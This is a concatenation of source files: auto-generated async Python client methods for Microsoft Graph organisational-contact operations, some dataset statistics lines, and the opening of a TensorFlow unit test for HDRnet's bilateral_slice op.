HttpResponseError(response=response, model=error, error_format=ARMErrorFormat) deserialized = self._deserialize('{object}', pipeline_response) if cls: return cls(pipeline_response, deserialized, {}) return deserialized create_ref_member_of.metadata = {'url': '/contacts/{orgContact-id}/memberOf/$ref'} # type: ignore async def check_member_groups( self, org_contact_id: str, body: "models.Paths175Njh2ContactsOrgcontactIdMicrosoftGraphCheckmembergroupsPostRequestbodyContentApplicationJsonSchema", **kwargs ) -> List[str]: """Invoke action checkMemberGroups. Invoke action checkMemberGroups. :param org_contact_id: key: id of orgContact. :type org_contact_id: str :param body: Action parameters. :type body: ~identity_directory_management.models.Paths175Njh2ContactsOrgcontactIdMicrosoftGraphCheckmembergroupsPostRequestbodyContentApplicationJsonSchema :keyword callable cls: A custom type or function that will be passed the direct response :return: list of str, or the result of cls(response) :rtype: list[str] :raises: ~azure.core.exceptions.HttpResponseError """ cls = kwargs.pop('cls', None) # type: ClsType[List[str]] error_map = { 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError } error_map.update(kwargs.pop('error_map', {})) content_type = kwargs.pop("content_type", "application/json") accept = "application/json" # Construct URL url = self.check_member_groups.metadata['url'] # type: ignore path_format_arguments = { 'orgContact-id': self._serialize.url("org_contact_id", org_contact_id, 'str'), } url = self._client.format_url(url, **path_format_arguments) # Construct parameters query_parameters = {} # type: Dict[str, Any] # Construct headers header_parameters = {} # type: Dict[str, Any] header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str') header_parameters['Accept'] = self._serialize.header("accept", accept, 'str') body_content_kwargs = {} # type: Dict[str, Any] body_content = self._serialize.body(body, 'Paths175Njh2ContactsOrgcontactIdMicrosoftGraphCheckmembergroupsPostRequestbodyContentApplicationJsonSchema') body_content_kwargs['content'] = body_content request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs) pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs) response = pipeline_response.http_response if response.status_code not in [200]: map_error(status_code=response.status_code, response=response, error_map=error_map) error = self._deserialize(models.OdataError, response) raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat) deserialized = self._deserialize('[str]', pipeline_response) if cls: return cls(pipeline_response, deserialized, {}) return deserialized check_member_groups.metadata = {'url': '/contacts/{orgContact-id}/microsoft.graph.checkMemberGroups'} # type: ignore async def check_member_objects( self, org_contact_id: str, body: "models.Paths8Ke2VbContactsOrgcontactIdMicrosoftGraphCheckmemberobjectsPostRequestbodyContentApplicationJsonSchema", **kwargs ) -> List[str]: """Invoke action checkMemberObjects. Invoke action checkMemberObjects. :param org_contact_id: key: id of orgContact. :type org_contact_id: str :param body: Action parameters. :type body: ~identity_directory_management.models.Paths8Ke2VbContactsOrgcontactIdMicrosoftGraphCheckmemberobjectsPostRequestbodyContentApplicationJsonSchema :keyword callable cls: A custom type or function that will be passed the direct response :return: list of str, or the result of cls(response) :rtype: list[str] :raises: ~azure.core.exceptions.HttpResponseError """ cls = kwargs.pop('cls', None) # type: ClsType[List[str]] error_map = { 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError } error_map.update(kwargs.pop('error_map', {})) content_type = kwargs.pop("content_type", "application/json") accept = "application/json" # Construct URL url = self.check_member_objects.metadata['url'] # type: ignore path_format_arguments = { 'orgContact-id': self._serialize.url("org_contact_id", org_contact_id, 'str'), } url = self._client.format_url(url, **path_format_arguments) # Construct parameters query_parameters = {} # type: Dict[str, Any] # Construct headers header_parameters = {} # type: Dict[str, Any] header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str') header_parameters['Accept'] = self._serialize.header("accept", accept, 'str') body_content_kwargs = {} # type: Dict[str, Any] body_content = self._serialize.body(body, 'Paths8Ke2VbContactsOrgcontactIdMicrosoftGraphCheckmemberobjectsPostRequestbodyContentApplicationJsonSchema') body_content_kwargs['content'] = body_content request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs) pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs) response = pipeline_response.http_response if response.status_code not in [200]: map_error(status_code=response.status_code, response=response, error_map=error_map) error = self._deserialize(models.OdataError, response) raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat) deserialized = self._deserialize('[str]', pipeline_response) if cls: return cls(pipeline_response, deserialized, {}) return deserialized check_member_objects.metadata = {'url': '/contacts/{orgContact-id}/microsoft.graph.checkMemberObjects'} # type: ignore async def get_member_groups( self, org_contact_id: str, body: "models.Paths3Y2P0KContactsOrgcontactIdMicrosoftGraphGetmembergroupsPostRequestbodyContentApplicationJsonSchema", **kwargs ) -> List[str]: """Invoke action getMemberGroups. Invoke action getMemberGroups. :param org_contact_id: key: id of orgContact. :type org_contact_id: str :param body: Action parameters. :type body: ~identity_directory_management.models.Paths3Y2P0KContactsOrgcontactIdMicrosoftGraphGetmembergroupsPostRequestbodyContentApplicationJsonSchema :keyword callable cls: A custom type or function that will be passed the direct response :return: list of str, or the result of cls(response) :rtype: list[str] :raises: ~azure.core.exceptions.HttpResponseError """ cls = kwargs.pop('cls', None) # type: ClsType[List[str]] error_map = { 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError } error_map.update(kwargs.pop('error_map', {})) content_type = kwargs.pop("content_type", "application/json") accept = "application/json" # Construct URL url = self.get_member_groups.metadata['url'] # type: ignore path_format_arguments = { 'orgContact-id': self._serialize.url("org_contact_id", org_contact_id, 'str'), } url = self._client.format_url(url, **path_format_arguments) # Construct parameters query_parameters = {} # type: Dict[str, Any] # Construct headers header_parameters = {} # type: Dict[str, Any] header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str') header_parameters['Accept'] = self._serialize.header("accept", accept, 'str') body_content_kwargs = {} # type: Dict[str, Any] body_content = self._serialize.body(body, 'Paths3Y2P0KContactsOrgcontactIdMicrosoftGraphGetmembergroupsPostRequestbodyContentApplicationJsonSchema') body_content_kwargs['content'] = body_content request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs) pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs) response = pipeline_response.http_response if response.status_code not in [200]: map_error(status_code=response.status_code, response=response, error_map=error_map) error = self._deserialize(models.OdataError, response) raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat) deserialized = self._deserialize('[str]', pipeline_response) if cls: return cls(pipeline_response, deserialized, {}) return deserialized get_member_groups.metadata = {'url': '/contacts/{orgContact-id}/microsoft.graph.getMemberGroups'} # type: ignore async def get_member_objects( self, org_contact_id: str, body: "models.Paths1M18OhpContactsOrgcontactIdMicrosoftGraphGetmemberobjectsPostRequestbodyContentApplicationJsonSchema", **kwargs ) -> List[str]: """Invoke action getMemberObjects. Invoke action getMemberObjects. :param org_contact_id: key: id of orgContact. :type org_contact_id: str :param body: Action parameters. :type body: ~identity_directory_management.models.Paths1M18OhpContactsOrgcontactIdMicrosoftGraphGetmemberobjectsPostRequestbodyContentApplicationJsonSchema :keyword callable cls: A custom type or function that will be passed the direct response :return: list of str, or the result of cls(response) :rtype: list[str] :raises: ~azure.core.exceptions.HttpResponseError """ cls = kwargs.pop('cls', None) # type: ClsType[List[str]] error_map = { 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError } error_map.update(kwargs.pop('error_map', {})) content_type = kwargs.pop("content_type", "application/json") accept = "application/json" # Construct URL url = self.get_member_objects.metadata['url'] # type: ignore path_format_arguments = { 'orgContact-id': self._serialize.url("org_contact_id", org_contact_id, 'str'), } url = self._client.format_url(url, **path_format_arguments) # Construct parameters query_parameters = {} # type: Dict[str, Any] # Construct headers header_parameters = {} # type: Dict[str, Any] header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str') header_parameters['Accept'] = self._serialize.header("accept", accept, 'str') body_content_kwargs = {} # type: Dict[str, Any] body_content = self._serialize.body(body, 'Paths1M18OhpContactsOrgcontactIdMicrosoftGraphGetmemberobjectsPostRequestbodyContentApplicationJsonSchema') body_content_kwargs['content'] = body_content request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs) pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs) response = pipeline_response.http_response if response.status_code not in [200]: map_error(status_code=response.status_code, response=response, error_map=error_map) error = self._deserialize(models.OdataError, response) raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat) deserialized = self._deserialize('[str]', pipeline_response) if cls: return cls(pipeline_response, deserialized, {}) return deserialized get_member_objects.metadata = {'url': '/contacts/{orgContact-id}/microsoft.graph.getMemberObjects'} # type: ignore async def restore( self, org_contact_id: str, **kwargs ) -> "models.MicrosoftGraphDirectoryObject": """Invoke action restore. Invoke action restore. :param org_contact_id: key: id of orgContact. :type org_contact_id: str :keyword callable cls: A custom type or function that will be passed the direct response :return: MicrosoftGraphDirectoryObject, or the result of cls(response) :rtype: ~identity_directory_management.models.MicrosoftGraphDirectoryObject :raises: ~azure.core.exceptions.HttpResponseError """ cls = kwargs.pop('cls', None) # type: ClsType["models.MicrosoftGraphDirectoryObject"] error_map = { 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError } error_map.update(kwargs.pop('error_map', {})) accept = "application/json" # Construct URL url = self.restore.metadata['url'] # type: ignore path_format_arguments = { 'orgContact-id': self._serialize.url("org_contact_id", org_contact_id, 'str'), } url = self._client.format_url(url, **path_format_arguments) # Construct parameters query_parameters = {} # type: Dict[str, Any] # Construct headers header_parameters = {} # type: Dict[str, Any] header_parameters['Accept'] = self._serialize.header("accept", accept, 'str') request = self._client.post(url, query_parameters, header_parameters) pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs) response = pipeline_response.http_response if response.status_code not in [200]: map_error(status_code=response.status_code, response=response, error_map=error_map) error = self._deserialize(models.OdataError, response) raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat) deserialized = self._deserialize('MicrosoftGraphDirectoryObject', pipeline_response) if cls: return cls(pipeline_response, deserialized, {}) return deserialized restore.metadata = {'url': '/contacts/{orgContact-id}/microsoft.graph.restore'} # type: ignore def list_transitive_member_of( self, org_contact_id: str, orderby: Optional[List[Union[str, "models.Enum13"]]] = None, select: Optional[List[Union[str, "models.Enum14"]]] = None, expand: Optional[List[str]] = None, **kwargs ) -> AsyncIterable["models.CollectionOfDirectoryObject1"]: """Get transitiveMemberOf from contacts. Get transitiveMemberOf from contacts. :param org_contact_id: key: id of orgContact. :type org_contact_id: str :param orderby: Order items by property values. :type orderby: list[str or ~identity_directory_management.models.Enum13] :param select: Select properties to be returned. :type select: list[str or ~identity_directory_management.models.Enum14] :param expand: Expand related entities. :type expand: list[str] :keyword callable cls: A custom type or function that will be passed the direct response :return: An iterator like instance of either CollectionOfDirectoryObject1 or the result of cls(response) :rtype: ~azure.core.async_paging.AsyncItemPaged[~identity_directory_management.models.CollectionOfDirectoryObject1] :raises: ~azure.core.exceptions.HttpResponseError """ cls = kwargs.pop('cls', None) # type: ClsType["models.CollectionOfDirectoryObject1"] error_map = { 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError } error_map.update(kwargs.pop('error_map', {})) accept = "application/json" def prepare_request(next_link=None): # Construct headers header_parameters = {} # type: Dict[str, Any] header_parameters['Accept'] = self._serialize.header("accept", accept, 'str') if not next_link: # Construct URL url = self.list_transitive_member_of.metadata['url'] # type: ignore path_format_arguments = { 'orgContact-id': self._serialize.url("org_contact_id", org_contact_id, 'str'), } url = self._client.format_url(url, **path_format_arguments) # Construct parameters query_parameters = {} # type: Dict[str, Any] if self._config.top is not None: query_parameters['$top'] = self._serialize.query("self._config.top", self._config.top, 'int', minimum=0) if self._config.skip is not None: query_parameters['$skip'] = self._serialize.query("self._config.skip", self._config.skip, 'int', minimum=0) if self._config.search is not None: query_parameters['$search'] = self._serialize.query("self._config.search", self._config.search, 'str') if self._config.filter is not None: query_parameters['$filter'] = self._serialize.query("self._config.filter", self._config.filter, 'str') if self._config.count is not None: query_parameters['$count'] = self._serialize.query("self._config.count", self._config.count, 'bool') if orderby is not None: query_parameters['$orderby'] = self._serialize.query("orderby", orderby, '[str]', div=',') if select is not None: query_parameters['$select'] = self._serialize.query("select", select, '[str]', div=',') if expand is not None: query_parameters['$expand'] = self._serialize.query("expand", expand, '[str]', div=',') request = self._client.get(url, query_parameters, header_parameters) else: url = next_link query_parameters = {} # type: Dict[str, Any] request = self._client.get(url, query_parameters, header_parameters) return request async def extract_data(pipeline_response): deserialized = self._deserialize('CollectionOfDirectoryObject1', pipeline_response) list_of_elem = deserialized.value if cls: list_of_elem = cls(list_of_elem) return deserialized.odata_next_link or None, AsyncList(list_of_elem) async def get_next(next_link=None): request = prepare_request(next_link) pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs) response = pipeline_response.http_response if response.status_code not in [200]: error = self._deserialize(models.OdataError, response) map_error(status_code=response.status_code, response=response, error_map=error_map) raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat) return pipeline_response return AsyncItemPaged( get_next, extract_data ) list_transitive_member_of.metadata = {'url': '/contacts/{orgContact-id}/transitiveMemberOf'} # type: ignore def list_ref_transitive_member_of( self, org_contact_id: str, orderby: Optional[List[Union[str, "models.Enum15"]]] = None, **kwargs ) -> AsyncIterable["models.CollectionOfLinksOfDirectoryObject1"]: """Get ref of transitiveMemberOf from contacts. Get ref of transitiveMemberOf from contacts. :param org_contact_id: key: id of orgContact. :type org_contact_id: str :param orderby: Order items by property values. :type orderby: list[str or ~identity_directory_management.models.Enum15] :keyword callable cls: A custom type or function that will be passed the direct response :return: An iterator like instance of either CollectionOfLinksOfDirectoryObject1 or the result of cls(response) :rtype: ~azure.core.async_paging.AsyncItemPaged[~identity_directory_management.models.CollectionOfLinksOfDirectoryObject1] :raises: ~azure.core.exceptions.HttpResponseError """ cls = kwargs.pop('cls', None) # type: ClsType["models.CollectionOfLinksOfDirectoryObject1"] error_map = { 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError } error_map.update(kwargs.pop('error_map', {})) accept = "application/json" def prepare_request(next_link=None): # Construct headers header_parameters = {} # type: Dict[str, Any] header_parameters['Accept'] = self._serialize.header("accept", accept, 'str') if not next_link: # Construct URL url = self.list_ref_transitive_member_of.metadata['url'] # type: ignore path_format_arguments = { 'orgContact-id': self._serialize.url("org_contact_id", org_contact_id, 'str'), } url = self._client.format_url(url, **path_format_arguments) # Construct parameters query_parameters = {} # type: Dict[str, Any] if self._config.top is not None: query_parameters['$top'] = self._serialize.query("self._config.top", self._config.top, 'int', minimum=0) if self._config.skip is not None: query_parameters['$skip'] = self._serialize.query("self._config.skip", self._config.skip, 'int', minimum=0) if self._config.search is not None: query_parameters['$search'] = self._serialize.query("self._config.search", self._config.search, 'str') if self._config.filter is not None: query_parameters['$filter'] = self._serialize.query("self._config.filter", self._config.filter, 'str') if self._config.count is not None: query_parameters['$count'] = self._serialize.query("self._config.count", self._config.count, 'bool') if orderby is not None: query_parameters['$orderby'] = self._serialize.query("orderby", orderby, '[str]', div=',') request = self._client.get(url, query_parameters, header_parameters) else: url = next_link query_parameters = {} # type: Dict[str, Any] request = self._client.get(url, query_parameters, header_parameters) return request async def extract_data(pipeline_response): deserialized = self._deserialize('CollectionOfLinksOfDirectoryObject1', pipeline_response) list_of_elem = deserialized.value if cls: list_of_elem = cls(list_of_elem) return deserialized.odata_next_link or None, AsyncList(list_of_elem) async def get_next(next_link=None): request = prepare_request(next_link) pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs) response = pipeline_response.http_response if response.status_code not in [200]: error = self._deserialize(models.OdataError, response) map_error(status_code=response.status_code, response=response, error_map=error_map) raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat) return pipeline_response return AsyncItemPaged( get_next, extract_data ) list_ref_transitive_member_of.metadata = {'url': '/contacts/{orgContact-id}/transitiveMemberOf/$ref'} # type: ignore async def create_ref_transitive_member_of( self, org_contact_id: str, body: Dict[str, object], **kwargs ) -> Dict[str, object]: """Create new navigation property ref to transitiveMemberOf for contacts. Create new navigation property ref to transitiveMemberOf for contacts. :param org_contact_id: key: id of orgContact. :type org_contact_id: str :param body: New navigation property ref value. :type body: dict[str, object] :keyword callable cls: A custom type or function that will be passed the direct response :return: dict mapping str to object, or the result of cls(response) :rtype: dict[str, object] :raises: ~azure.core.exceptions.HttpResponseError """ cls = kwargs.pop('cls', None) # type: ClsType[Dict[str, object]] error_map = { 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError } error_map.update(kwargs.pop('error_map', {})) content_type = kwargs.pop("content_type", "application/json") accept = "application/json" # Construct URL url = self.create_ref_transitive_member_of.metadata['url'] # type: ignore path_format_arguments = { 'orgContact-id': self._serialize.url("org_contact_id", org_contact_id, 'str'), } url = self._client.format_url(url, **path_format_arguments) # Construct parameters query_parameters = {} # type: Dict[str, Any] # Construct headers header_parameters = {} # type: Dict[str, Any] header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str') header_parameters['Accept'] = self._serialize.header("accept", accept, 'str') body_content_kwargs = {} # type: Dict[str, Any] body_content = self._serialize.body(body, '{object}') body_content_kwargs['content'] = body_content request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs) pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs) response = pipeline_response.http_response if response.status_code not in [201]: map_error(status_code=response.status_code, response=response, error_map=error_map) error = self._deserialize(models.OdataError, response) raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat) deserialized = self._deserialize('{object}', pipeline_response) if cls: return cls(pipeline_response, deserialized, {}) return deserialized create_ref_transitive_member_of.metadata = {'url': '/contacts/{orgContact-id}/transitiveMemberOf/$ref'} # type: ignore async def delta( self, **kwargs ) -> List["models.MicrosoftGraphOrgContact"]: """Invoke function delta. Invoke function delta. :keyword callable cls: A custom type or function that will be passed the direct response :return: list of MicrosoftGraphOrgContact, or the result of cls(response) :rtype: list[~identity_directory_management.models.MicrosoftGraphOrgContact] :raises: ~azure.core.exceptions.HttpResponseError """ cls = kwargs.pop('cls', None) # type: ClsType[List["models.MicrosoftGraphOrgContact"]] error_map = { 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError } error_map.update(kwargs.pop('error_map', {})) accept = "application/json" # Construct URL url = self.delta.metadata['url'] # type: ignore # Construct parameters query_parameters = {} # type: Dict[str, Any] # Construct headers header_parameters = {} # type: Dict[str, Any] header_parameters['Accept'] = self._serialize.header("accept", accept, 'str') request = self._client.get(url, query_parameters, header_parameters) pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs) response = pipeline_response.http_response if response.status_code not in [200]: map_error(status_code=response.status_code, response=response, error_map=error_map) error = self._deserialize(models.OdataError, response) raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat) deserialized = self._deserialize('[MicrosoftGraphOrgContact]', pipeline_response) if cls: return cls(pipeline_response, deserialized, {}) return deserialized delta.metadata = {'url': '/contacts/microsoft.graph.delta()'} # type: ignore async def get_available_extension_properties( self, body: "models.Paths1L581IfContactsMicrosoftGraphGetavailableextensionpropertiesPostRequestbodyContentApplicationJsonSchema", **kwargs ) -> List["models.MicrosoftGraphExtensionProperty"]: """Invoke action getAvailableExtensionProperties. Invoke action getAvailableExtensionProperties. :param body: Action parameters. :type body: ~identity_directory_management.models.Paths1L581IfContactsMicrosoftGraphGetavailableextensionpropertiesPostRequestbodyContentApplicationJsonSchema :keyword callable cls: A custom type or function that will be passed the direct response :return: list of MicrosoftGraphExtensionProperty, or the result of cls(response) :rtype: list[~identity_directory_management.models.MicrosoftGraphExtensionProperty] :raises: ~azure.core.exceptions.HttpResponseError """ cls = kwargs.pop('cls', None) # type: ClsType[List["models.MicrosoftGraphExtensionProperty"]] error_map = { 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError } error_map.update(kwargs.pop('error_map', {})) content_type = kwargs.pop("content_type", "application/json") accept = "application/json" # Construct URL url = self.get_available_extension_properties.metadata['url'] # type: ignore # Construct parameters query_parameters = {} # type: Dict[str, Any] # Construct headers header_parameters = {} # type: Dict[str, Any] header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str') header_parameters['Accept'] = self._serialize.header("accept", accept, 'str') body_content_kwargs = {} # type: Dict[str, Any] body_content = self._serialize.body(body, 'Paths1L581IfContactsMicrosoftGraphGetavailableextensionpropertiesPostRequestbodyContentApplicationJsonSchema') body_content_kwargs['content'] = body_content request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs) pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs) response = pipeline_response.http_response if response.status_code not in [200]: map_error(status_code=response.status_code, response=response, error_map=error_map) error = self._deserialize(models.OdataError, response) raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat) deserialized = self._deserialize('[MicrosoftGraphExtensionProperty]', pipeline_response) if cls: return cls(pipeline_response, deserialized, {}) return deserialized get_available_extension_properties.metadata = {'url': '/contacts/microsoft.graph.getAvailableExtensionProperties'} # type: ignore async def get_by_ids( self, body: "models.Paths12Azg33ContactsMicrosoftGraphGetbyidsPostRequestbodyContentApplicationJsonSchema", **kwargs ) -> List["models.MicrosoftGraphDirectoryObject"]: """Invoke action getByIds. Invoke action getByIds. :param body: Action parameters. :type body: ~identity_directory_management.models.Paths12Azg33ContactsMicrosoftGraphGetbyidsPostRequestbodyContentApplicationJsonSchema :keyword callable cls: A custom type or function that will be passed the direct response :return: list of MicrosoftGraphDirectoryObject, or the result of cls(response) :rtype: list[~identity_directory_management.models.MicrosoftGraphDirectoryObject] :raises: ~azure.core.exceptions.HttpResponseError """ cls = kwargs.pop('cls', None) # type: ClsType[List["models.MicrosoftGraphDirectoryObject"]] error_map = { 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError } error_map.update(kwargs.pop('error_map', {})) content_type = kwargs.pop("content_type", "application/json") accept = "application/json" # Construct URL url = self.get_by_ids.metadata['url'] # type: ignore # Construct parameters query_parameters = {} # type: Dict[str, Any] # Construct headers header_parameters = {} # type: Dict[str, Any] header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str') header_parameters['Accept'] = self._serialize.header("accept", accept, 'str') body_content_kwargs = {} # type: Dict[str, Any] body_content = self._serialize.body(body, 'Paths12Azg33ContactsMicrosoftGraphGetbyidsPostRequestbodyContentApplicationJsonSchema') body_content_kwargs['content'] = body_content request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs) pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs) response = pipeline_response.http_response if response.status_code not in [200]: map_error(status_code=response.status_code, response=response, error_map=error_map) error = self._deserialize(models.OdataError, response) raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat) deserialized = self._deserialize('[MicrosoftGraphDirectoryObject]', pipeline_response) if cls: return cls(pipeline_response, deserialized, {}) return deserialized get_by_ids.metadata = {'url': '/contacts/microsoft.graph.getByIds'} # type: ignore async def validate_properties( self, body: "models.Paths7Cg04SContactsMicrosoftGraphValidatepropertiesPostRequestbodyContentApplicationJsonSchema", **kwargs ) -> None: """Invoke action validateProperties. Invoke action validateProperties. :param body: Action parameters. :type body: ~identity_directory_management.models.Paths7Cg04SContactsMicrosoftGraphValidatepropertiesPostRequestbodyContentApplicationJsonSchema :keyword callable cls: A custom type or function that will be passed the direct response :return: None, or the result of cls(response) :rtype: None :raises: ~azure.core.exceptions.HttpResponseError """ cls = kwargs.pop('cls', None) # type: ClsType[None] error_map = { 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError } error_map.update(kwargs.pop('error_map', {})) content_type = kwargs.pop("content_type", "application/json") accept = "application/json" # Construct URL url = self.validate_properties.metadata['url'] # type: ignore # Construct parameters query_parameters = {} # type: Dict[str, Any] # Construct headers header_parameters = {} # type: Dict[str, Any] header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str') header_parameters['Accept'] = self._serialize.header("accept", accept, 'str') body_content_kwargs = {} # type: Dict[str, Any] body_content = self._serialize.body(body, 'Paths7Cg04SContactsMicrosoftGraphValidatepropertiesPostRequestbodyContentApplicationJsonSchema') body_content_kwargs['content'] = body_content request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs) pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs) response = pipeline_response.http_response if response.status_code not in [204]: map_error(status_code=response.status_code, response=response, error_map=error_map) error = self._deserialize(models.OdataError, response) raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat) if cls: return cls(pipeline_response, None, {}) validate_properties.metadata = {'url': '/contacts/microsoft.graph.validateProperties'} # type: ignore
48.597488
166
0.657559
7,717
73,528
6.058313
0.035506
0.018823
0.023101
0.018267
0.869353
0.862701
0.853268
0.846445
0.840606
0.82097
0
0.007133
0.241133
73,528
1,512
167
48.62963
0.830747
0.125571
0
0.808351
0
0
0.124972
0.058584
0
0
0
0
0
1
0.013919
false
0
0.008565
0
0.08137
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
ceb4c45995ecee640c248fb16c082ae0d036f5ae
15,840
py
Python
hdrnet/hdrnet_ops_test.py
ceciliavision/hdrnet-google
867b1aea301a8f78c23ad7153cc0e0d6cb546ec5
[ "Apache-2.0" ]
680
2017-09-01T02:48:53.000Z
2022-03-30T17:37:19.000Z
hdrnet/hdrnet_ops_test.py
ceciliavision/hdrnet-google
867b1aea301a8f78c23ad7153cc0e0d6cb546ec5
[ "Apache-2.0" ]
18
2020-09-22T00:32:08.000Z
2022-03-24T15:45:38.000Z
hdrnet/hdrnet_ops_test.py
ceciliavision/hdrnet-google
867b1aea301a8f78c23ad7153cc0e0d6cb546ec5
[ "Apache-2.0" ]
176
2017-08-31T13:34:17.000Z
2022-03-25T04:36:10.000Z
# Lint as: python3 """Tests for custom tensorflow operators in HDRnet (CUDA only).""" import collections import hdrnet_ops as ops import numpy as np from parameterized import parameterized import tensorflow.compat.v1 as tf def _assert_tf_shape_equals(test_case, expected_shape, tf_tensor): tf_shape = tf_tensor.shape.as_list() tf.logging.info('expected_shape: %s, tf_shape: %s', expected_shape, tf_shape) test_case.assertEqual(expected_shape, tf_shape) def _assert_np_shape_equals(test_case, expected_shape, np_array): np_shape = list(np_array.shape) tf.logging.info('expected_shape: %s, np_shape: %s', expected_shape, np_shape) test_case.assertEqual(expected_shape, np_shape) def _assert_shape_equals(test_case, expected_shape, np_array, tf_tensor): """Asserts equality on shapes given numpy and tf inputs. Asserts (using test_case.assertEqual) that both np_array and tf_tensor has shape expected_shape. Args: test_case: (tf.test.TestCase) The TestCase currently being run. expected_shape: (list of ints) The expected shape. np_array: (np.ndarray) The input numpy array. tf_tensor: (tf.Tensor) The input Tensorflow Tensor. """ _assert_tf_shape_equals(test_case, expected_shape, tf_tensor) _assert_np_shape_equals(test_case, expected_shape, np_array) def _get_device_string(use_gpu): if use_gpu: return '/gpu:0' else: return '/cpu:0' _ForwardTestExtents = collections.namedtuple( '_ForwardTestExtents', 'batch_size, h, w, input_channels, gh, gw, gd, gc, output_channels') class BilateralSliceTest(tf.test.TestCase): def run_bilateral_slice(self, grid_data, guide_data, use_gpu): dev = _get_device_string(use_gpu) graph = tf.Graph() with graph.as_default(): with tf.device(dev): grid_tensor = tf.convert_to_tensor( grid_data, name='grid', dtype=tf.float32) guide_tensor = tf.convert_to_tensor( guide_data, name='guide', dtype=tf.float32) output_tensor = ops.bilateral_slice(grid_tensor, guide_tensor) with self.test_session( graph=graph, use_gpu=use_gpu, force_gpu=use_gpu) as sess: output_data = sess.run(output_tensor) return output_data, output_tensor def run_bilateral_slice_grad(self, grid_data, guide_data, use_gpu): dev = _get_device_string(use_gpu) graph = tf.Graph() with graph.as_default(): with tf.device(dev): grid_tensor = tf.convert_to_tensor( grid_data, name='grid', dtype=tf.float32) guide_tensor = tf.convert_to_tensor( guide_data, name='guide', dtype=tf.float32) output_tensor = ops.bilateral_slice(grid_tensor, guide_tensor) grid_grad_tensor, guide_grad_tensor = tf.gradients( output_tensor, [grid_tensor, guide_tensor]) with self.test_session( graph=graph, use_gpu=use_gpu, force_gpu=use_gpu) as sess: grid_grad_data, guide_grad_data = sess.run( [grid_grad_tensor, guide_grad_tensor]) return (grid_grad_tensor, guide_grad_tensor, grid_grad_data, guide_grad_data) def create_forward_test(self, batch_size=3, h=30, w=25, input_channels=3, gh=16, gw=12, gd=8, output_channels=3, randomize_values=True): np.random.seed(1234) gc = output_channels * (1 + input_channels) grid_shape = (batch_size, gh, gw, gd, gc) guide_shape = (batch_size, h, w) if randomize_values: grid_data = np.random.rand(*grid_shape).astype(np.float32) guide_data = np.random.rand(*guide_shape).astype(np.float32) else: grid_data = np.zeros(grid_shape) guide_data = np.zeros(guide_shape) sz = _ForwardTestExtents(batch_size, h, w, input_channels, gh, gw, gd, gc, output_channels) return sz, grid_data, guide_data @parameterized.expand([('CPU', False), ('GPU', True)]) def test_shape(self, use_gpu): """bilateral_slice(grid, guide) should have the right shape.""" sz, grid_data, guide_data = self.create_forward_test() output_data, output_tensor = self.run_bilateral_slice( grid_data, guide_data, use_gpu) _assert_shape_equals(self, [sz.batch_size, sz.h, sz.w, sz.gc], output_data, output_tensor) @parameterized.expand([('CPU', False), ('GPU', True)]) def test_grad_shape(self, use_gpu): """gradient(bilateral_slice(grid, guide)) should have the right shape.""" sz, grid_data, guide_data = self.create_forward_test() grid_grad_tensor, guide_grad_tensor, grid_grad_data, guide_grad_data = ( self.run_bilateral_slice_grad(grid_data, guide_data, use_gpu)) _assert_shape_equals(self, [sz.batch_size, sz.gh, sz.gw, sz.gd, sz.gc], grid_grad_data, grid_grad_tensor) _assert_shape_equals(self, [sz.batch_size, sz.h, sz.w], guide_grad_data, guide_grad_tensor) # TODO(jiawen): Read back both CPU and GPU gradients 